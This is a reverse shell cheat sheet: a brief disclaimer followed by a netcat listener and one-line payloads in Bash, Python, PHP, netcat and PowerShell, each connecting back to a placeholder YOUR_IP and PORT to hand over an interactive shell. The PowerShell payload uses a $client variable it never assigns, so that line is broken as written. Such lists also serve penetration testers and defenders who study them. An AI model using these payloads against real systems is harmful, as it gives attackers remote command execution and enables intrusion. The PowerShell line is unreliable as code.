Reverse Shell Cheat Sheet

For educational and authorized security testing only. Only use on systems you own or have permission to test.

Listener: nc -lvnp 4444 — Replace YOUR_IP and PORT in payloads below.

Bash

bash -i >& /dev/tcp/YOUR_IP/PORT 0>&1

Python

python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("YOUR_IP",PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

PHP

php -r '$sock=fsockopen("YOUR_IP",PORT);$proc=proc_open("/bin/sh -i",array(0=>$sock,1=>$sock,2=>$sock),$pipes);'

Netcat

nc -e /bin/sh YOUR_IP PORT

# If -e not available:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc YOUR_IP PORT >/tmp/f

PowerShell (Windows)

powershell -NoP -NonI -W Hidden -Exec Bypass -Command "New-Object System.Net.Sockets.TCPClient('YOUR_IP',PORT);$stream=$client.GetStream();[byte[]]$bytes=0..65535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex $data 2>&1|Out-String);$sendback2=$sendback+'PS '+(pwd).Path+'> ';$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"